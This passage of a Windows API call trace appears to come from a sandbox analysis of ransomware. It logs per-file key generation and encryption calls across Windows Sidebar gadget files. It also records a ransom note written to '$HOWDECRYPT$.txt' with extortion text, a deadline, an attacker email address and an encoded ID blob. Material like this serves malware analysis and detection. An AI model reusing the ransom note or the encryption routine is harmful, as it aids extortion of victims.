pdwDataLen=0x25ce8f0*=0x30) returned 1 [0160.939] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\slideShow.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\css\\slideshow.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.944] GetProcessHeap () returned 0x2c0000 [0160.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.944] GetProcessHeap () returned 0x2c0000 [0160.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb15b8 | out: hHeap=0x2c0000) returned 1 [0160.944] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.980] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.980] WriteFile (in: hFile=0x178, lpBuffer=0x25ce82b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce954, lpOverlapped=0x0 | out: lpBuffer=0x25ce82b*, lpNumberOfBytesWritten=0x25ce954*=0x127, lpOverlapped=0x0) returned 1 [0160.981] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.981] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce954, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce954*=0x2ac, lpOverlapped=0x0) returned 1 [0160.981] CloseHandle (hObject=0x178) returned 1 [0160.981] GetProcessHeap () returned 0x2c0000 [0160.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8aa38 | out: hHeap=0x2c0000) returned 1 [0160.981] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8f0 | out: pbBuffer=0x25ce8f0) returned 1 [0160.981] GetProcessHeap () returned 0x2c0000 [0160.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.981] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8e8*=0x30) returned 1 [0160.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_docked.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rss_headline_glow_docked.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.985] GetProcessHeap () returned 0x2c0000 [0160.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.986] GetProcessHeap () returned 0x2c0000 [0160.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3da48 | out: hHeap=0x2c0000) returned 1 [0160.986] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8f0 | out: pbBuffer=0x25ce8f0) returned 1 [0160.986] GetProcessHeap () returned 0x2c0000 [0160.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.986] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8e8*=0x30) returned 1 [0160.986] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\navBack.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\navback.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.992] GetProcessHeap () returned 0x2c0000 [0160.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.992] GetProcessHeap () returned 0x2c0000 [0160.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3c088 | out: hHeap=0x2c0000) returned 1 [0160.992] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8e8 | out: pbBuffer=0x25ce8e8) returned 1 [0160.992] GetProcessHeap () returned 0x2c0000 [0160.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.992] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8e0*=0x30) returned 1 [0160.992] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\flyoutback.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.997] GetProcessHeap () returned 0x2c0000 [0160.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.997] GetProcessHeap () returned 0x2c0000 [0160.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb12b8 | out: hHeap=0x2c0000) returned 1 [0160.997] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8e8 | out: pbBuffer=0x25ce8e8) returned 1 [0160.997] GetProcessHeap () returned 0x2c0000 [0160.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.997] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8e0*=0x30) returned 1 [0160.997] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttondown_off.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.001] GetProcessHeap () returned 0x2c0000 [0161.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.001] GetProcessHeap () returned 0x2c0000 [0161.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c89fb0 | out: hHeap=0x2c0000) returned 1 [0161.001] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8e0 | out: pbBuffer=0x25ce8e0) returned 1 [0161.001] GetProcessHeap () returned 0x2c0000 [0161.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.001] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8d8*=0x30) returned 1 [0161.001] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\RSSFeeds.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\rssfeeds.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.007] GetProcessHeap () returned 0x2c0000 [0161.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.007] GetProcessHeap () returned 0x2c0000 [0161.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3be98 | out: hHeap=0x2c0000) returned 1 [0161.007] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8e0 | out: pbBuffer=0x25ce8e0) returned 1 [0161.007] GetProcessHeap () returned 0x2c0000 [0161.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.007] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8d8*=0x30) returned 1 [0161.007] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\settings.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\js\\settings.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.024] GetProcessHeap () returned 0x2c0000 [0161.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.024] GetProcessHeap () returned 0x2c0000 [0161.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3bda0 | out: hHeap=0x2c0000) returned 1 [0161.024] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8d8 | out: pbBuffer=0x25ce8d8) returned 1 [0161.024] GetProcessHeap () returned 0x2c0000 [0161.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.024] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8d0*=0x30) returned 1 [0161.024] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_up.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.063] GetProcessHeap () returned 0x2c0000 [0161.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.064] GetProcessHeap () returned 0x2c0000 [0161.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb09b8 | out: hHeap=0x2c0000) returned 1 [0161.064] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8d8 | out: pbBuffer=0x25ce8d8) returned 1 [0161.064] GetProcessHeap () returned 0x2c0000 [0161.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.064] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8d0*=0x30) returned 1 [0161.064] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\shuffle_up.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.070] GetProcessHeap () returned 0x2c0000 [0161.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.070] GetProcessHeap () returned 0x2c0000 [0161.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c89878 | out: hHeap=0x2c0000) returned 1 [0161.070] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8d0 | out: pbBuffer=0x25ce8d0) returned 1 [0161.070] GetProcessHeap () returned 0x2c0000 [0161.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.070] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8c8*=0x30) returned 1 [0161.070] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_rest.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.127] GetProcessHeap () returned 0x2c0000 [0161.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.127] GetProcessHeap () returned 0x2c0000 [0161.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3d4d0 | out: hHeap=0x2c0000) returned 1 [0161.127] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8d0 | out: pbBuffer=0x25ce8d0) returned 1 [0161.127] GetProcessHeap () returned 0x2c0000 [0161.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.128] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8c8*=0x30) returned 1 [0161.128] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_disabled.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_disabled.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.250] GetProcessHeap () returned 0x2c0000 [0161.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.250] GetProcessHeap () returned 0x2c0000 [0161.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c82fa8 | out: hHeap=0x2c0000) returned 1 [0161.250] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8c8 | out: pbBuffer=0x25ce8c8) returned 1 [0161.250] GetProcessHeap () returned 0x2c0000 [0161.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.250] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8c0*=0x30) returned 1 [0161.250] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_top_right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_top_right.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.261] GetProcessHeap () returned 0x2c0000 [0161.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.261] GetProcessHeap () returned 0x2c0000 [0161.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c82c30 | out: hHeap=0x2c0000) returned 1 [0161.261] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8c8 | out: pbBuffer=0x25ce8c8) returned 1 [0161.261] GetProcessHeap () returned 0x2c0000 [0161.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.261] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8c0*=0x30) returned 1 [0161.261] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_top.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_top.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.265] GetProcessHeap () returned 0x2c0000 [0161.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.265] GetProcessHeap () returned 0x2c0000 [0161.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3cf58 | out: hHeap=0x2c0000) returned 1 [0161.265] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8c0 | out: pbBuffer=0x25ce8c0) returned 1 [0161.265] GetProcessHeap () returned 0x2c0000 [0161.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.265] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8b8*=0x30) returned 1 [0161.265] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_divider_left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_divider_left.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.268] GetProcessHeap () returned 0x2c0000 [0161.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.269] GetProcessHeap () returned 0x2c0000 [0161.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c82668 | out: hHeap=0x2c0000) returned 1 [0161.269] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8c0 | out: pbBuffer=0x25ce8c0) returned 1 [0161.269] GetProcessHeap () returned 0x2c0000 [0161.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.269] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8b8*=0x30) returned 1 [0161.269] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\hint_down.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.272] GetProcessHeap () returned 0x2c0000 [0161.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.272] GetProcessHeap () returned 0x2c0000 [0161.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c89350 | out: hHeap=0x2c0000) returned 1 [0161.272] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8b8 | out: pbBuffer=0x25ce8b8) returned 1 [0161.272] GetProcessHeap () returned 0x2c0000 [0161.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.273] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8b0*=0x30) returned 1 [0161.273] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\9.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\9.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.277] GetProcessHeap () returned 0x2c0000 [0161.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.277] GetProcessHeap () returned 0x2c0000 [0161.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3b8c8 | out: hHeap=0x2c0000) returned 1 [0161.277] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8b8 | out: pbBuffer=0x25ce8b8) returned 1 [0161.277] GetProcessHeap () returned 0x2c0000 [0161.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.277] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8b0*=0x30) returned 1 [0161.277] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\5.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.281] GetProcessHeap () returned 0x2c0000 [0161.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.281] GetProcessHeap () returned 0x2c0000 [0161.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3b4e8 | out: hHeap=0x2c0000) returned 1 [0161.281] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8b0 | out: pbBuffer=0x25ce8b0) returned 1 [0161.281] GetProcessHeap () returned 0x2c0000 [0161.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.281] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8a8*=0x30) returned 1 [0161.281] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\11.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.293] GetProcessHeap () returned 0x2c0000 [0161.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.293] GetProcessHeap () returned 0x2c0000 [0161.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3b108 | out: hHeap=0x2c0000) returned 1 [0161.293] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8b0 | out: pbBuffer=0x25ce8b0) returned 1 [0161.293] GetProcessHeap () returned 0x2c0000 [0161.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.293] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8a8*=0x30) returned 1 [0161.293] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\logo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.394] GetProcessHeap () returned 0x2c0000 [0161.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.394] GetProcessHeap () returned 0x2c0000 [0161.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb2b78 | out: hHeap=0x2c0000) returned 1 [0161.394] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8a8 | out: pbBuffer=0x25ce8a8) returned 1 [0161.394] GetProcessHeap () returned 0x2c0000 [0161.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) 